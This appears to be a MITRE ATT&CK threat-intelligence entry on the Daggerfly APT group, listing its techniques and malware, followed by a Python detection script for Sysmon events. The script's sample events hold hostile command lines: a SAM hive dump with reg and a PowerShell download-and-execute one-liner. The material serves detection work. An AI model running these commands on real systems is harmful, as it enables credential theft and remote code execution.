
Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.(Citation: Symantec Daggerfly 2023)(Citation: ESET EvasivePanda 2023)(Citation: Symantec Daggerfly 2024)(Citation: ESET EvasivePanda 2024)
ID: G1034
Associated Groups: Evasive Panda, BRONZE HIGHLAND
Created: 25 Jul 2024
Last Modified: 31 Oct 2024

Associated Group Descriptions

Name | Description
Evasive Panda | (Citation: Symantec Daggerfly 2023)(Citation: ESET EvasivePanda 2024)
BRONZE HIGHLAND | (Citation: Symantec Daggerfly 2023)(Citation: ESET EvasivePanda 2024)

Techniques Used

Domain ID Name Use
Enterprise T1071.001 Application Layer Protocol: Web Protocols

Daggerfly uses HTTP for command and control communication.(Citation: ESET EvasivePanda 2024)

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.(Citation: Symantec Daggerfly 2023)

Enterprise T1584.004 Compromise Infrastructure: Server

Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.(Citation: ESET EvasivePanda 2024)

Enterprise T1136.001 Create Account: Local Account

Daggerfly created a local account on victim machines to maintain access.(Citation: Symantec Daggerfly 2023)

Enterprise T1587.002 Develop Capabilities: Code Signing Certificates

Daggerfly created code signing certificates to sign malicious macOS files.(Citation: ESET EvasivePanda 2024)

Enterprise T1574.002 Hijack Execution Flow: DLL Side-Loading

Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.(Citation: Symantec Daggerfly 2023) Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.(Citation: ESET EvasivePanda 2024)

Enterprise T1036.003 Masquerading: Rename System Utilities

Daggerfly used a renamed version of rundll32.exe, such as "dbengin.exe" located in the `ProgramData\Microsoft\PlayReady` directory, to proxy malicious DLL execution.(Citation: Symantec Daggerfly 2023)

Enterprise T1003.002 OS Credential Dumping: Security Account Manager

Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.(Citation: Symantec Daggerfly 2023)

Enterprise T1053.005 Scheduled Task/Job: Scheduled Task

Daggerfly has attempted to use scheduled tasks for persistence in victim environments.(Citation: ESET EvasivePanda 2024)

Enterprise T1553.002 Subvert Trust Controls: Code Signing

Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.(Citation: ESET EvasivePanda 2024)

Enterprise T1195.002 Supply Chain Compromise: Compromise Software Supply Chain

Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.(Citation: ESET EvasivePanda 2023)(Citation: ESET EvasivePanda 2024)

Enterprise T1218.011 System Binary Proxy Execution: Rundll32

Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.(Citation: Symantec Daggerfly 2023)

Enterprise T1204.001 User Execution: Malicious Link

Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.(Citation: ESET EvasivePanda 2024)
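As an added example (not part of the ATT&CK entry or of the cited reports), the following Python detection logic checks constructed Sysmon-style process-creation events for three of the behaviours listed above: the renamed rundll32.exe proxy (T1036.003 / T1218.011), Reg exporting the SAM hive (T1003.002), and PowerShell download-and-execute (T1059.001). Field names follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine); the sample events and the exact command-line forms matched are assumptions.

```python
import ntpath
import re

# Constructed sample events (not real telemetry); field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"Image": r"C:\ProgramData\Microsoft\PlayReady\dbengin.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"dbengin.exe C:\ProgramData\Microsoft\PlayReady\x.dll,Start"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "OriginalFileName": "reg.exe",
     "CommandLine": r"reg save hklm\sam C:\Users\Public\sam.hiv"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')\""},
]

def renamed_rundll32(ev):
    """T1036.003 / T1218.011: PE header says rundll32, but the file on disk has another name."""
    if ev.get("OriginalFileName", "").lower() != "rundll32.exe":
        return False
    return ntpath.basename(ev["Image"]).lower() != "rundll32.exe"

def sam_hive_export(ev):
    """T1003.002: reg.exe saving or exporting the SAM hive (assumed command form)."""
    cmd = ev.get("CommandLine", "").lower()
    return (ntpath.basename(ev["Image"]).lower() == "reg.exe"
            and re.search(r"\b(save|export)\s+hklm\\sam\b", cmd) is not None)

def powershell_download_exec(ev):
    """T1059.001: PowerShell fetching remote content and invoking it in one command line."""
    if ntpath.basename(ev["Image"]).lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = ev.get("CommandLine", "").lower()
    fetch = any(k in cmd for k in ("downloadstring", "downloadfile", "invoke-webrequest"))
    run = any(k in cmd for k in ("iex", "invoke-expression", "start-process"))
    return fetch and run

RULES = {"renamed_rundll32": renamed_rundll32,
         "sam_hive_export": sam_hive_export,
         "powershell_download_exec": powershell_download_exec}

def detect(events):
    """Return (rule_name, image_path) for every event that matches a rule."""
    return [(name, ev["Image"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```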

Software

ID | Name | References | Techniques
S1147 | Nightdoor | (Citation: ESET EvasivePanda 2024) (Citation: Symantec Daggerfly 2024) | Web Service, Process Discovery, Scheduled Task, Windows Command Shell, Hijack Execution Flow, System Checks, System Time Discovery, System Network Configuration Discovery, File Deletion, System Owner/User Discovery, System Information Discovery, Deobfuscate/Decode Files or Information, Application Layer Protocol
S0190 | BITSAdmin | (Citation: Microsoft BITSAdmin) (Citation: Symantec Daggerfly 2023) | Lateral Tool Transfer, Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, BITS Jobs
S0013 | PlugX | (Citation: CIRCL PlugX March 2013) (Citation: Dell TG-3390) (Citation: DestroyRAT) (Citation: FireEye Clandestine Fox Part 2) (Citation: Kaba) (Citation: Korplug) (Citation: Lastline PlugX Analysis) (Citation: New DragonOK) (Citation: Novetta-Axiom) (Citation: Sogu) (Citation: Symantec Daggerfly 2023) (Citation: Thoper) (Citation: TVT) | Modify Registry, File and Directory Discovery, Masquerade Task or Service, Hidden Files and Directories, Multiband Communication, Non-Application Layer Protocol, Keylogging, Dead Drop Resolver, DLL Side-Loading, Process Discovery, Query Registry, DLL Search Order Hijacking, Network Share Discovery, MSBuild, Web Protocols, Windows Service, Windows Command Shell, Ingress Tool Transfer, System Checks, System Network Connections Discovery, Match Legitimate Name or Location, Registry Run Keys / Startup Folder, Custom Command and Control Protocol, DNS, Screen Capture, Commonly Used Port, Symmetric Cryptography, Deobfuscate/Decode Files or Information, Native API, Obfuscated Files or Information
S1146 | MgBot | (Citation: ESET EvasivePanda 2023) (Citation: Symantec Daggerfly 2024) (Citation: Szappanos MgBot 2014) | Keylogging, System Owner/User Discovery, Domain Account, OS Credential Dumping, Credentials from Password Stores, Local Account, Data from Information Repositories, Credentials from Web Browsers, Data from Local System, Data from Removable Media, Domain Trust Discovery, Clipboard Data, Steal Web Session Cookie, Remote System Discovery, Process Discovery, Network Service Discovery, Audio Capture
S1016 | MacMa | (Citation: DazzleSpy) (Citation: ESET DazzleSpy Jan 2022) (Citation: Objective-See MacMa Nov 2021) (Citation: OSX.CDDS) (Citation: Symantec Daggerfly 2024) | System Owner/User Discovery, System Information Discovery, Non-Application Layer Protocol, Code Signing, Screen Capture, System Network Configuration Discovery, Local Data Staging, Launch Agent, Data from Local System, Clear Linux or Mac System Logs, Remote Services, Native API, Audio Capture, Keychain, Exfiltration Over C2 Channel, Process Discovery, Timestomp, Non-Standard Port, Deobfuscate/Decode Files or Information, Keylogging, Unix Shell, Gatekeeper Bypass, Ingress Tool Transfer, Encrypted Channel, File and Directory Discovery, File Deletion
S0075 | Reg | (Citation: Microsoft Reg) (Citation: Symantec Daggerfly 2023) (Citation: Windows Commands JPCERT) | Credentials in Registry, Query Registry, Modify Registry
